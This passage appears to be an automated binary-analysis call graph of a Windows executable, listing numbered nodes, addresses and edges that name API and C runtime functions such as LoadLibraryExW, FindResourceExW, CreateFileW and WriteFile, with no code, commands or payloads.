104972->106219 104973 907de1 59 API calls 104973->104987 104974 969e4a 89 API calls 104974->104987 104976 909c90 59 API calls Mailbox 104976->104987 104977 90b73c 304 API calls 104977->104987 104979 9084c0 69 API calls 104979->104987 104980 95617e 59 API calls Mailbox 104980->104987 104981 9089b3 69 API calls 104981->104987 104982 9455d5 VariantClear 104982->104987 104983 956e8f 59 API calls 104983->104987 104984 94566b VariantClear 104984->104987 104985 908cd4 59 API calls Mailbox 104985->104987 104986 945419 VariantClear 104986->104987 104987->104918 104987->104924 104987->104926 104987->104930 104987->104931 104987->104932 104987->104933 104987->104934 104987->104936 104987->104938 104987->104939 104987->104941 104987->104943 104987->104945 104987->104965 104987->104971 104987->104972 104987->104973 104987->104974 104987->104976 104987->104977 104987->104979 104987->104980 104987->104981 104987->104982 104987->104983 104987->104984 104987->104985 104987->104986 106047 90e6a0 104987->106047 106078 90f460 104987->106078 106097 9031ce 104987->106097 106102 90e420 331 API calls 104987->106102 106103 90fce0 104987->106103 106189 986018 59 API calls 104987->106189 106190 969a15 59 API calls Mailbox 104987->106190 106191 95d4f2 59 API calls 104987->106191 106192 909837 104987->106192 106210 9560ef 59 API calls 2 library calls 104987->106210 106211 908401 59 API calls 104987->106211 106212 9082df 59 API calls Mailbox 104987->106212 104988->104738 104989->104748 104990->104758 104992 931940 __write_nolock 104991->104992 104993 904713 GetModuleFileNameW 104992->104993 104994 907de1 59 API calls 104993->104994 104995 904739 104994->104995 104996 904750 60 API calls 104995->104996 104997 904743 Mailbox 104996->104997 104997->104764 104999 907df0 __wsetenvp _memmove 104998->104999 105000 920db6 Mailbox 59 API calls 104999->105000 105001 907e2e 105000->105001 105001->104769 105003 903d3e __write_nolock 105002->105003 105004 907bcc 59 API calls 105003->105004 105008 903ea4 Mailbox 105003->105008 105006 903d70 105004->105006 105012 903da6 Mailbox 105006->105012 105124 9079f2 105006->105124 105007 903e77 105007->105008 105009 907de1 59 API calls 105007->105009 105008->104794 105011 903e98 105009->105011 105010 907de1 59 API calls 105010->105012 105013 903f74 59 API calls 105011->105013 105012->105007 105012->105008 105012->105010 105015 9079f2 59 API calls 105012->105015 105127 903f74 105012->105127 105013->105008 105015->105012 105133 904bb5 105016->105133 105021 93d8e6 105023 904e4a 84 API calls 105021->105023 105022 904e08 LoadLibraryExW 105143 904b6a 105022->105143 105025 93d8ed 105023->105025 105027 904b6a 3 API calls 105025->105027 105029 93d8f5 105027->105029 105169 904f0b 105029->105169 105030 904e2f 105030->105029 105031 904e3b 105030->105031 105032 904e4a 84 API calls 105031->105032 105034 9037d4 105032->105034 105034->104801 105034->104802 105037 93d91c 105177 904ec7 105037->105177 105039 93d929 105041 920db6 Mailbox 59 API calls 105040->105041 105042 9037fb 105041->105042 105042->104815 105044 9084cb 105043->105044 105046 9084f2 105044->105046 105431 9089b3 69 API calls Mailbox 105044->105431 105046->104819 105048 903ef3 105047->105048 105049 903eda 105047->105049 105051 907bcc 59 API calls 105048->105051 105050 908047 59 API calls 105049->105050 105052 903879 105050->105052 105051->105052 105053 922efd 105052->105053 105054 922f09 105053->105054 105055 922f7e 105053->105055 105062 922f2e 105054->105062 105432 928b28 58 API calls __getptd_noexit 105054->105432 105434 922f90 60 API calls 4 library calls 105055->105434 105058 922f8b 105058->104839 105059 922f15 105433 928db6 9 API calls __write_nolock 105059->105433 105061 922f20 105061->104839 105062->104839 105064 9092d6 105063->105064 105065 920db6 Mailbox 59 API calls 105064->105065 105066 9092e4 105065->105066 105067 903924 105066->105067 105435 9091fc 59 API calls Mailbox 105066->105435 105069 909050 105067->105069 105436 909160 105069->105436 105071 90905f 105072 920db6 Mailbox 59 API calls 105071->105072 105073 903932 105071->105073 105072->105073 105074 908ee0 105073->105074 105075 93f17c 105074->105075 105080 908ef7 105074->105080 105075->105080 105446 908bdb 59 API calls Mailbox 105075->105446 105077 909040 105445 909d3c 60 API calls Mailbox 105077->105445 105078 908ff8 105081 920db6 Mailbox 59 API calls 105078->105081 105080->105077 105080->105078 105082 908fff 105080->105082 105081->105082 105082->104868 105084 904ee5 85 API calls 105083->105084 105085 9695ca 105084->105085 105447 969734 105085->105447 105088 904f0b 74 API calls 105089 9695f7 105088->105089 105090 904f0b 74 API calls 105089->105090 105091 969607 105090->105091 105092 904f0b 74 API calls 105091->105092 105093 969622 105092->105093 105094 904f0b 74 API calls 105093->105094 105095 96963d 105094->105095 105096 904ee5 85 API calls 105095->105096 105097 969654 105096->105097 105098 92571c __malloc_crt 58 API calls 105097->105098 105099 96965b 105098->105099 105100 92571c __malloc_crt 58 API calls 105099->105100 105101 969665 105100->105101 105102 904f0b 74 API calls 105101->105102 105103 969679 105102->105103 105104 969109 GetSystemTimeAsFileTime 105103->105104 105105 96968c 105104->105105 105106 9696b6 105105->105106 105107 9696a1 105105->105107 105109 9696bc 105106->105109 105110 96971b 105106->105110 105108 922d55 _free 58 API calls 105107->105108 105111 9696a7 105108->105111 105453 968b06 116 API calls __fcloseall 105109->105453 105113 922d55 _free 58 API calls 105110->105113 105114 922d55 _free 58 API calls 105111->105114 105116 93d186 105113->105116 105114->105116 105115 969713 105117 922d55 _free 58 API calls 105115->105117 105116->104805 105118 904e4a 105116->105118 105117->105116 105119 904e54 105118->105119 105120 904e5b 105118->105120 105454 9253a6 105119->105454 105122 904e6a 105120->105122 105123 904e7b FreeLibrary 105120->105123 105122->104805 105123->105122 105125 907e4f 59 API calls 105124->105125 105126 9079fd 105125->105126 105126->105006 105128 903f82 105127->105128 105132 903fa4 _memmove 105127->105132 105130 920db6 Mailbox 59 API calls 105128->105130 105129 920db6 Mailbox 59 API calls 105131 903fb8 105129->105131 105130->105132 105131->105012 105132->105129 105182 904c03 105133->105182 105136 904c03 2 API calls 105139 904bdc 105136->105139 105137 904bf5 105140 92525b 105137->105140 105138 904bec FreeLibrary 105138->105137 105139->105137 105139->105138 105186 925270 105140->105186 105142 904dfc 105142->105021 105142->105022 105346 904c36 105143->105346 105146 904b8f 105148 904ba1 FreeLibrary 105146->105148 105149 904baa 105146->105149 105147 904c36 2 API calls 105147->105146 105148->105149 105150 904c70 105149->105150 105151 920db6 Mailbox 59 API calls 105150->105151 105152 904c85 105151->105152 105350 90522e 105152->105350 105154 904c91 _memmove 105155 904ccc 105154->105155 105157 904dc1 105154->105157 105158 904d89 105154->105158 105156 904ec7 69 API calls 105155->105156 105165 904cd5 105156->105165 105364 96991b 95 API calls 105157->105364 105353 904e89 CreateStreamOnHGlobal 105158->105353 105161 904f0b 74 API calls 105161->105165 105163 904d69 105163->105030 105164 93d8a7 105166 904ee5 85 API calls 105164->105166 105165->105161 105165->105163 105165->105164 105359 904ee5 105165->105359 105167 93d8bb 105166->105167 105168 904f0b 74 API calls 105167->105168 105168->105163 105170 904f1d 105169->105170 105173 93d9cd 105169->105173 105388 9255e2 105170->105388 105174 969109 105408 968f5f 105174->105408 105176 96911f 105176->105037 105178 93d990 105177->105178 105179 904ed6 105177->105179 105413 925c60 105179->105413 105181 904ede 105181->105039 105183 904bd0 105182->105183 105184 904c0c LoadLibraryA 105182->105184 105183->105136 105183->105139 105184->105183 105185 904c1d GetProcAddress 105184->105185 105185->105183 105189 92527c __close 105186->105189 105187 92528f 105235 928b28 58 API calls __getptd_noexit 105187->105235 105189->105187 105191 9252c0 105189->105191 105190 925294 105236 928db6 9 API calls __write_nolock 105190->105236 105205 9304e8 105191->105205 105194 9252c5 105195 9252db 105194->105195 105196 9252ce 105194->105196 105197 925305 105195->105197 105198 9252e5 105195->105198 105237 928b28 58 API calls __getptd_noexit 105196->105237 105220 930607 105197->105220 105238 928b28 58 API calls __getptd_noexit 105198->105238 105202 92529f __close @_EH4_CallFilterFunc@8 105202->105142 105206 9304f4 __close 105205->105206 105207 929c0b __lock 58 API calls 105206->105207 105218 930502 105207->105218 105208 930576 105240 9305fe 105208->105240 105209 93057d 105245 92881d 58 API calls __malloc_crt 105209->105245 105212 930584 105212->105208 105246 929e2b InitializeCriticalSectionAndSpinCount 105212->105246 105213 9305f3 __close 105213->105194 105215 929c93 __mtinitlocknum 58 API calls 105215->105218 105217 9305aa EnterCriticalSection 105217->105208 105218->105208 105218->105209 105218->105215 105243 926c50 59 API calls __lock 105218->105243 105244 926cba LeaveCriticalSection LeaveCriticalSection _doexit 105218->105244 105221 930627 __wopenfile 105220->105221 105222 930641 105221->105222 105234 9307fc 105221->105234 105253 9237cb 60 API calls 3 library calls 105221->105253 105251 928b28 58 API calls __getptd_noexit 105222->105251 105224 930646 105252 928db6 9 API calls __write_nolock 105224->105252 105226 93085f 105248 9385a1 105226->105248 105228 925310 105239 925332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105228->105239 105230 9307f5 105230->105234 105254 9237cb 60 API calls 3 library calls 105230->105254 105232 930814 105232->105234 105255 9237cb 60 API calls 3 library calls 105232->105255 105234->105222 105234->105226 105235->105190 105236->105202 105237->105202 105238->105202 105239->105202 105247 929d75 LeaveCriticalSection 105240->105247 105242 930605 105242->105213 105243->105218 105244->105218 105245->105212 105246->105217 105247->105242 105256 937d85 105248->105256 105250 9385ba 105250->105228 105251->105224 105252->105228 105253->105230 105254->105232 105255->105234 105258 937d91 __close 105256->105258 105257 937da7 105343 928b28 58 API calls __getptd_noexit 105257->105343 105258->105257 105261 937ddd 105258->105261 105260 937dac 105344 928db6 9 API calls __write_nolock 105260->105344 105267 937e4e 105261->105267 105264 937df9 105345 937e22 LeaveCriticalSection __unlock_fhandle 105264->105345 105266 937db6 __close 105266->105250 105268 937e6e 105267->105268 105269 9244ea __wsopen_nolock 58 API calls 105268->105269 105273 937e8a 105269->105273 105270 937fc1 105271 928dc6 __invoke_watson 8 API calls 105270->105271 105272 9385a0 105271->105272 105275 937d85 __wsopen_helper 103 API calls 105272->105275 105273->105270 105274 937ec4 105273->105274 105285 937ee7 105273->105285 105276 928af4 __dosmaperr 58 API calls 105274->105276 105277 9385ba 105275->105277 105278 937ec9 105276->105278 105277->105264 105279 928b28 __dosmaperr 58 API calls 105278->105279 105280 937ed6 105279->105280 105282 928db6 __write_nolock 9 API calls 105280->105282 105281 937fa5 105283 928af4 __dosmaperr 58 API calls 105281->105283 105284 937ee0 105282->105284 105286 937faa 105283->105286 105284->105264 105285->105281 105289 937f83 105285->105289 105287 928b28 __dosmaperr 58 API calls 105286->105287 105288 937fb7 105287->105288 105290 928db6 __write_nolock 9 API calls 105288->105290 105291 92d294 __alloc_osfhnd 61 API calls 105289->105291 105290->105270 105292 938051 105291->105292 105293 93805b 105292->105293 105294 93807e 105292->105294 105295 928af4 __dosmaperr 58 API calls 105293->105295 105296 937cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105294->105296 105297 938060 105295->105297 105304 9380a0 105296->105304 105298 928b28 __dosmaperr 58 API calls 105297->105298 105301 93806a 105298->105301 105299 93811e GetFileType 105302 93816b 105299->105302 105303 938129 GetLastError 105299->105303 105300 9380ec GetLastError 105305 928b07 __dosmaperr 58 API calls 105300->105305 105306 928b28 __dosmaperr 58 API calls 105301->105306 105312 92d52a __set_osfhnd 59 API calls 105302->105312 105307 928b07 __dosmaperr 58 API calls 105303->105307 105304->105299 105304->105300 105308 937cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105304->105308 105309 938111 105305->105309 105306->105284 105310 938150 CloseHandle 105307->105310 105311 9380e1 105308->105311 105314 928b28 __dosmaperr 58 API calls 105309->105314 105310->105309 105313 93815e 105310->105313 105311->105299 105311->105300 105317 938189 105312->105317 105315 928b28 __dosmaperr 58 API calls 105313->105315 105314->105270 105316 938163 105315->105316 105316->105309 105318 938344 105317->105318 105319 9318c1 __lseeki64_nolock 60 API calls 105317->105319 105335 93820a 105317->105335 105318->105270 105320 938517 CloseHandle 105318->105320 105322 9381f3 105319->105322 105321 937cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105320->105321 105324 93853e 105321->105324 105325 928af4 __dosmaperr 58 API calls 105322->105325 105341 938212 105322->105341 105323 930e5b 70 API calls __read_nolock 105323->105341 105326 938546 GetLastError 105324->105326 105327 9383ce 105324->105327 105325->105335 105328 928b07 __dosmaperr 58 API calls 105326->105328 105327->105270 105331 938552 105328->105331 105329 930add __close_nolock 61 API calls 105329->105341 105330 9318c1 60 API calls __lseeki64_nolock 105330->105341 105332 92d43d __free_osfhnd 59 API calls 105331->105332 105332->105327 105333 9397a2 __chsize_nolock 82 API calls 105333->105341 105334 92d886 __write 78 API calls 105334->105335 105335->105318 105335->105334 105337 9318c1 60 API calls __lseeki64_nolock 105335->105337 105335->105341 105336 9383c1 105339 930add __close_nolock 61 API calls 105336->105339 105337->105335 105338 9383aa 105338->105318 105340 9383c8 105339->105340 105342 928b28 __dosmaperr 58 API calls 105340->105342 105341->105323 105341->105329 105341->105330 105341->105333 105341->105335 105341->105336 105341->105338 105342->105327 105343->105260 105344->105266 105345->105266 105347 904b83 105346->105347 105348 904c3f LoadLibraryA 105346->105348 105347->105146 105347->105147 105348->105347 105349 904c50 GetProcAddress 105348->105349 105349->105347 105351 920db6 Mailbox 59 API calls 105350->105351 105352 905240 105351->105352 105352->105154 105354 904ea3 FindResourceExW 105353->105354 105356 904ec0 105353->105356 105355 93d933 LoadResource 105354->105355 105354->105356 105355->105356 105357 93d948 SizeofResource 105355->105357 105356->105155 105357->105356 105358 93d95c LockResource 105357->105358 105358->105356 105360 904ef4 105359->105360 105361 93d9ab 105359->105361 105365 92584d 105360->105365 105363 904f02 105363->105165 105364->105155 105366 925859 __close 105365->105366 105367 92586b 105366->105367 105369 925891 105366->105369 105378 928b28 58 API calls __getptd_noexit 105367->105378 105380 926c11 105369->105380 105370 925870 105379 928db6 9 API calls __write_nolock 105370->105379 105373 925897 105386 9257be 83 API calls 5 library calls 105373->105386 105375 9258a6 105387 9258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105375->105387 105377 92587b __close 105377->105363 105378->105370 105379->105377 105381 926c43 EnterCriticalSection 105380->105381 105382 926c21 105380->105382 105384 926c39 105381->105384 105382->105381 105383 926c29 105382->105383 105385 929c0b __lock 58 API calls 105383->105385 105384->105373 105385->105384 105386->105375 105387->105377 105391 9255fd 105388->105391 105390 904f2e 105390->105174 105392 925609 __close 105391->105392 105393 92564c 105392->105393 105394 925644 __close 105392->105394 105396 92561f _memset 105392->105396 105395 926c11 __lock_file 59 API calls 105393->105395 105394->105390 105398 925652 105395->105398 105404 928b28 58 API calls __getptd_noexit 105396->105404 105406 92541d 72 API calls 7 library calls 105398->105406 105399 925639 105405 928db6 9 API calls __write_nolock 105399->105405 105402 925668 105407 925686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105402->105407 105404->105399 105405->105394 105406->105402 105407->105394 105411 92520a GetSystemTimeAsFileTime 105408->105411 105410 968f6e 105410->105176 105412 925238 __aulldiv 105411->105412 105412->105410 105414 925c6c __close 105413->105414 105415 925c93 105414->105415 105416 925c7e 105414->105416 105418 926c11 __lock_file 59 API calls 105415->105418 105427 928b28 58 API calls __getptd_noexit 105416->105427 105420 925c99 105418->105420 105419 925c83 105428 928db6 9 API calls __write_nolock 105419->105428 105429 9258d0 67 API calls 6 library calls 105420->105429 105423 925ca4 105430 925cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105423->105430 105425 925cb6 105426 925c8e __close 105425->105426 105426->105181 105427->105419 105428->105426 105429->105423 105430->105425 105431->105046 105432->105059 105433->105061 105434->105058 105435->105067 105437 909169 Mailbox 105436->105437 105438 93f19f 105437->105438 105441 909173 105437->105441 105439 920db6 Mailbox 59 API calls 105438->105439 105443 93f1ab 105439->105443 105440 90917a 105440->105071 105441->105440 105444 909c90 59 API calls Mailbox 105441->105444 105443->105443 105444->105441 105445->105082 105446->105080 105448 969748 __tzset_nolock _wcscmp 105447->105448 105449 904f0b 74 API calls 105448->105449 105450 9695dc 105448->105450 105451 969109 GetSystemTimeAsFileTime 105448->105451 105452 904ee5 85 API calls 105448->105452 105449->105448 105450->105088 105450->105116 105451->105448 105452->105448 105453->105115 105455 9253b2 __close 105454->105455 105456 9253c6 105455->105456 105457 9253de 105455->105457 105483 928b28 58 API calls __getptd_noexit 105456->105483 105459 926c11 __lock_file 59 API calls 105457->105459 105463 9253d6 __close 105457->105463 105461 9253f0 105459->105461 105460 9253cb 105484 928db6 9 API calls __write_nolock 105460->105484 105467 92533a 105461->105467 105463->105120 105468 925349 105467->105468 105470 92535d 105467->105470 105529 928b28 58 API calls __getptd_noexit 105468->105529 105471 925359 105470->105471 105486 924a3d 105470->105486 105485 925415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105471->105485 105472 92534e 105530 928db6 9 API calls __write_nolock 105472->105530 105479 925377 105503 930a02 105479->105503 105481 92537d 105481->105471 105482 922d55 _free 58 API calls 105481->105482 105482->105471 105483->105460 105484->105463 105485->105463 105487 924a50 105486->105487 105491 924a74 105486->105491 105488 9246e6 __fputwc_nolock 58 API calls 105487->105488 105487->105491 105489 924a6d 105488->105489 105531 92d886 105489->105531 105492 930b77 105491->105492 105493 930b84 105492->105493 105495 925371 105492->105495 105494 922d55 _free 58 API calls 105493->105494 105493->105495 105494->105495 105496 9246e6 105495->105496 105497 9246f0 105496->105497 105498 924705 105496->105498 105666 928b28 58 API calls __getptd_noexit 105497->105666 105498->105479 105500 9246f5 105667 928db6 9 API calls __write_nolock 105500->105667 105502 924700 105502->105479 105504 930a0e __close 105503->105504 105505 930a1b 105504->105505 105507 930a32 105504->105507 105683 928af4 58 API calls __getptd_noexit 105505->105683 105508 930abd 105507->105508 105510 930a42 105507->105510 105688 928af4 58 API calls __getptd_noexit 105508->105688 105509 930a20 105684 928b28 58 API calls __getptd_noexit 105509->105684 105513 930a60 105510->105513 105514 930a6a 105510->105514 105685 928af4 58 API calls __getptd_noexit 105513->105685 105517 92d206 ___lock_fhandle 59 API calls 105514->105517 105515 930a65 105689 928b28 58 API calls __getptd_noexit 105515->105689 105518 930a70 105517->105518 105520 930a83 105518->105520 105521 930a8e 105518->105521 105668 930add 105520->105668 105686 928b28 58 API calls __getptd_noexit 105521->105686 105522 930ac9 105690 928db6 9 API calls __write_nolock 105522->105690 105525 930a27 __close 105525->105481 105527 930a89 105687 930ab5 LeaveCriticalSection __unlock_fhandle 105527->105687 105529->105472 105530->105471 105532 92d892 __close 105531->105532 105533 92d8b6 105532->105533 105534 92d89f 105532->105534 105536 92d955 105533->105536 105538 92d8ca 105533->105538 105632 928af4 58 API calls __getptd_noexit 105534->105632 105638 928af4 58 API calls __getptd_noexit 105536->105638 105537 92d8a4 105633 928b28 58 API calls __getptd_noexit 105537->105633 105541 92d8f2 105538->105541 105542 92d8e8 105538->105542 105559 92d206 105541->105559 105634 928af4 58 API calls __getptd_noexit 105542->105634 105543 92d8ed 105639 928b28 58 API calls __getptd_noexit 105543->105639 105546 92d8f8 105548 92d90b 105546->105548 105549 92d91e 105546->105549 105568 92d975 105548->105568 105635 928b28 58 API calls __getptd_noexit 105549->105635 105550 92d961 105640 928db6 9 API calls __write_nolock 105550->105640 105554 92d8ab __close 105554->105491 105555 92d917 105637 92d94d LeaveCriticalSection __unlock_fhandle 105555->105637 105556 92d923 105636 928af4 58 API calls __getptd_noexit 105556->105636 105560 92d212 __close 105559->105560 105561 92d261 EnterCriticalSection 105560->105561 105562 929c0b __lock 58 API calls 105560->105562 105563 92d287 __close 105561->105563 105564 92d237 105562->105564 105563->105546 105565 92d24f 105564->105565 105641 929e2b InitializeCriticalSectionAndSpinCount 105564->105641 105642 92d28b LeaveCriticalSection _doexit 105565->105642 105569 92d982 __write_nolock 105568->105569 105570 92d9e0 105569->105570 105571 92d9c1 105569->105571 105599 92d9b6 105569->105599 105574 92da38 105570->105574 105575 92da1c 105570->105575 105652 928af4 58 API calls __getptd_noexit 105571->105652 105572 92c5f6 __87except 6 API calls 105576 92e1d6 105572->105576 105579 92da51 105574->105579 105658 9318c1 60 API calls 2 library calls 105574->105658 105655 928af4 58 API calls __getptd_noexit 105575->105655 105576->105555 105577 92d9c6 105653 928b28 58 API calls __getptd_noexit 105577->105653 105643 935c6b 105579->105643 105582 92d9cd 105654 928db6 9 API calls __write_nolock 105582->105654 105584 92da21 105656 928b28 58 API calls __getptd_noexit 105584->105656 105586 92da5f 105588 92ddb8 105586->105588 105659 9299ac 58 API calls 2 library calls 105586->105659 105590 92ddd6 105588->105590 105591 92e14b WriteFile 105588->105591 105589 92da28 105657 928db6 9 API calls __write_nolock 105589->105657 105594 92defa 105590->105594 105603 92ddec 105590->105603 105595 92ddab GetLastError 105591->105595 105601 92dd78 105591->105601 105606 92df05 105594->105606 105609 92dfef 105594->105609 105595->105601 105596 92da8b GetConsoleMode 105596->105588 105598 92daca 105596->105598 105597 92e184 105597->105599 105664 928b28 58 API calls __getptd_noexit 105597->105664 105598->105588 105602 92dada GetConsoleCP 105598->105602 105599->105572 105601->105597 105601->105599 105608 92ded8 105601->105608 105602->105597 105628 92db09 105602->105628 105603->105597 105604 92de5b WriteFile 105603->105604 105604->105595 105605 92de98 105604->105605 105605->105603 105610 92debc 105605->105610 105606->105597 105611 92df6a WriteFile 105606->105611 105607 92e1b2 105665 928af4 58 API calls __getptd_noexit 105607->105665 105613 92dee3 105608->105613 105614 92e17b 105608->105614 105609->105597 105615 92e064 WideCharToMultiByte 105609->105615 105610->105601 105611->105595 105616 92dfb9 105611->105616 105661 928b28 58 API calls __getptd_noexit 105613->105661 105663 928b07 58 API calls __dosmaperr 105614->105663 105615->105595 105624 92e0ab 105615->105624 105616->105601 105616->105606 105616->105610 105619 92e0b3 WriteFile 105622 92e106 GetLastError 105619->105622 105619->105624 105620 92dee8 105662 928af4 58 API calls __getptd_noexit 105620->105662 105622->105624 105624->105601 105624->105609 105624->105610 105624->105619 105625 9362ba 60 API calls __write_nolock 105625->105628 105626 92dbf2 WideCharToMultiByte 105626->105601 105627 92dc2d WriteFile 105626->105627 105627->105595 105630 92dc5f 105627->105630 105628->105601 105628->105625 105628->105626 105628->105630 105660 9235f5 58 API calls __isleadbyte_l 105628->105660 105629 937a5e WriteConsoleW CreateFileW __putwch_nolock 105629->105630 105630->105595 105630->105601 105630->105628 105630->105629 105631 92dc87 WriteFile 105630->105631 105631->105595 105631->105630 105632->105537 105633->105554 105634->105543 105635->105556 105636->105555 105637->105554 105638->105543 105639->105550 105640->105554 105641->105565 105642->105561 105644 935c83 105643->105644 105645 935c76 105643->105645 105648 935c8f 105644->105648 105649 928b28 __dosmaperr 58 API calls 105644->105649 105646 928b28 __dosmaperr 58 API calls 105645->105646 105647 935c7b 105646->105647 105647->105586 105648->105586 105650 935cb0 105649->105650 105651 928db6 __write_nolock 9 API calls 105650->105651 105651->105647 105652->105577 105653->105582 105654->105599 105655->105584 105656->105589 105657->105599 105658->105579 105659->105596 105660->105628 105661->105620 105662->105599 105663->105599 105664->105607 105665->105599 105666->105500 105667->105502 105691 92d4c3 105668->105691 105670 930b41 105704 92d43d 59 API calls __dosmaperr 105670->105704 105672 930aeb 105672->105670 105673 930b1f 105672->105673 105675 92d4c3 __lseek_nolock 58 API calls 105672->105675 105673->105670 105676 92d4c3 __lseek_nolock 58 API calls 105673->105676 105674 930b49 105677 930b6b 105674->105677 105705 928b07 58 API calls __dosmaperr 105674->105705 105678 930b16 105675->105678 105679 930b2b CloseHandle 105676->105679 105677->105527 105681 92d4c3 __lseek_nolock 58 API calls 105678->105681 105679->105670 105682 930b37 GetLastError 105679->105682 105681->105673 105682->105670 105683->105509 105684->105525 105685->105515 105686->105527 105687->105525 105688->105515 105689->105522 105690->105525 105692 92d4e3 105691->105692 105693 92d4ce 105691->105693 105698 92d508 105692->105698 105708 928af4 58 API calls __getptd_noexit 105692->105708 105706 928af4 58 API calls __getptd_noexit 105693->105706 105695 92d4d3 105707 928b28 58 API calls __getptd_noexit 105695->105707 105698->105672 105699 92d512 105709 928b28 58 API calls __getptd_noexit 105699->105709 105700 92d4db 105700->105672 105702 92d51a 105710 928db6 9 API calls __write_nolock 105702->105710 105704->105674 105705->105677 105706->105695 105707->105700 105708->105699 105709->105702 105710->105700 105773 931940 105711->105773 105714 904799 105779 907d8c 105714->105779 105715 90477c 105716 907bcc 59 API calls 105715->105716 105718 904788 105716->105718 105775 907726 105718->105775 105721 920791 105722 931940 __write_nolock 105721->105722 105723 92079e GetLongPathNameW 105722->105723 105724 907bcc 59 API calls 105723->105724 105725 9072bd 105724->105725 105726 90700b 105725->105726 105727 907667 59 API calls 105726->105727 105728 90701d 105727->105728 105729 904750 60 API calls 105728->105729 105730 907028 105729->105730 105731 907033 105730->105731 105732 93e885 105730->105732 105733 903f74 59 API calls 105731->105733 105736 93e89f 105732->105736 105789 907908 61 API calls 105732->105789 105735 90703f 105733->105735 105783 9034c2 105735->105783 105738 907052 Mailbox 105738->104884 105740 904ddd 136 API calls 105739->105740 105741 90688f 105740->105741 105742 93e031 105741->105742 105743 904ddd 136 API calls 105741->105743 105744 96955b 122 API calls 105742->105744 105745 9068a3 105743->105745 105746 93e046 105744->105746 105745->105742 105747 9068ab 105745->105747 105748 93e067 105746->105748 105749 93e04a 105746->105749 105751 93e052 105747->105751 105752 9068b7 105747->105752 105750 920db6 Mailbox 59 API calls 105748->105750 105753 904e4a 84 API calls 105749->105753 105772 93e0ac Mailbox 105750->105772 105896 9642f8 90 API calls _wprintf 105751->105896 105790 906a8c 105752->105790 105753->105751 105756 93e060 105756->105748 105758 93e260 105759 922d55 _free 58 API calls 105758->105759 105760 93e268 105759->105760 105761 904e4a 84 API calls 105760->105761 105766 93e271 105761->105766 105765 922d55 _free 58 API calls 105765->105766 105766->105765 105768 904e4a 84 API calls 105766->105768 105900 95f7a1 89 API calls 4 library calls 105766->105900 105768->105766 105769 907de1 59 API calls 105769->105772 105772->105758 105772->105766 105772->105769 105882 90750f 105772->105882 105890 90735d 105772->105890 105897 95f73d 59 API calls 2 library calls 105772->105897 105898 95f65e 61 API calls 2 library calls 105772->105898 105899 96737f 59 API calls Mailbox 105772->105899 105774 90475d GetFullPathNameW 105773->105774 105774->105714 105774->105715 105776 907734 105775->105776 105777 907d2c 59 API calls 105776->105777 105778 904794 105777->105778 105778->105721 105780 907da6 105779->105780 105782 907d99 105779->105782 105781 920db6 Mailbox 59 API calls 105780->105781 105781->105782 105782->105718 105784 9034d4 105783->105784 105788 9034f3 _memmove 105783->105788 105786 920db6 Mailbox 59 API calls 105784->105786 105785 920db6 Mailbox 59 API calls 105787 90350a 105785->105787 105786->105788 105787->105738 105788->105785 105789->105732 105791 906ab5 105790->105791 105792 93e41e 105790->105792 105906 9057a6 60 API calls Mailbox 105791->105906 105973 95f7a1 89 API calls 4 library calls 105792->105973 105795 93e431 105974 95f7a1 89 API calls 4 library calls 105795->105974 105796 906ad7 105907 9057f6 67 API calls 105796->105907 105798 906aec 105798->105795 105799 906af4 105798->105799 105801 907667 59 API calls 105799->105801 105803 906b00 105801->105803 105802 93e44d 105805 906b61 105802->105805 105908 920957 60 API calls __write_nolock 105803->105908 105807 93e460 105805->105807 105808 906b6f 105805->105808 105806 906b0c 105809 907667 59 API calls 105806->105809 105810 905c6f CloseHandle 105807->105810 105811 907667 59 API calls 105808->105811 105812 906b18 105809->105812 105813 93e46c 105810->105813 105814 906b78 105811->105814 105816 904750 60 API calls 105812->105816 105817 904ddd 136 API calls 105813->105817 105815 907667 59 API calls 105814->105815 105818 906b81 105815->105818 105819 906b26 105816->105819 105820 93e488 105817->105820 105911 90459b 105818->105911 105909 905850 ReadFile SetFilePointerEx 105819->105909 105823 93e4b1 105820->105823 105824 96955b 122 API calls 105820->105824 105975 95f7a1 89 API calls 4 library calls 105823->105975 105828 93e4a4 105824->105828 105825 906b98 105829 907b2e 59 API calls 105825->105829 105827 906b52 105910 905aee SetFilePointerEx SetFilePointerEx 105827->105910 105831 93e4cd 105828->105831 105832 93e4ac 105828->105832 105833 906ba9 SetCurrentDirectoryW 105829->105833 105835 904e4a 84 API calls 105831->105835 105834 904e4a 84 API calls 105832->105834 105839 906bbc Mailbox 105833->105839 105834->105823 105837 93e4d2 105835->105837 105836 906d0c Mailbox 105901 9057d4 105836->105901 105838 920db6 Mailbox 59 API calls 105837->105838 105845 93e506 105838->105845 105841 920db6 Mailbox 59 API calls 105839->105841 105843 906bcf 105841->105843 105842 903bbb 105842->104738 105842->104746 105844 90522e 59 API calls 105843->105844 105874 906bda Mailbox __wsetenvp 105844->105874 105846 90750f 59 API calls 105845->105846 105879 93e54f Mailbox 105846->105879 105847 906ce7 105969 905c6f 105847->105969 105850 906cf3 SetCurrentDirectoryW 105850->105836 105851 93e740 105980 9672df 59 API calls Mailbox 105851->105980 105854 93e762 105981 97fbce 59 API calls 2 library calls 105854->105981 105857 93e76f 105859 922d55 _free 58 API calls 105857->105859 105858 93e7d9 105984 95f7a1 89 API calls 4 library calls 105858->105984 105859->105836 105862 90750f 59 API calls 105862->105879 105863 93e7f2 105863->105847 105864 93e7d1 105983 95f5f7 59 API calls 4 library calls 105864->105983 105866 907de1 59 API calls 105866->105874 105871 907de1 59 API calls 105871->105879 105874->105847 105874->105858 105874->105864 105874->105866 105962 90586d 67 API calls _wcscpy 105874->105962 105963 906f5d GetStringTypeW 105874->105963 105964 906ecc 60 API calls __wcsnicmp 105874->105964 105965 906faa GetStringTypeW __wsetenvp 105874->105965 105966 92363d GetStringTypeW _iswctype 105874->105966 105967 9068dc 165 API calls 3 library calls 105874->105967 105968 907213 59 API calls Mailbox 105874->105968 105876 93e792 105982 95f7a1 89 API calls 4 library calls 105876->105982 105878 93e7ab 105880 922d55 _free 58 API calls 105878->105880 105879->105851 105879->105862 105879->105871 105879->105876 105976 95f73d 59 API calls 2 library calls 105879->105976 105977 95f65e 61 API calls 2 library calls 105879->105977 105978 96737f 59 API calls Mailbox 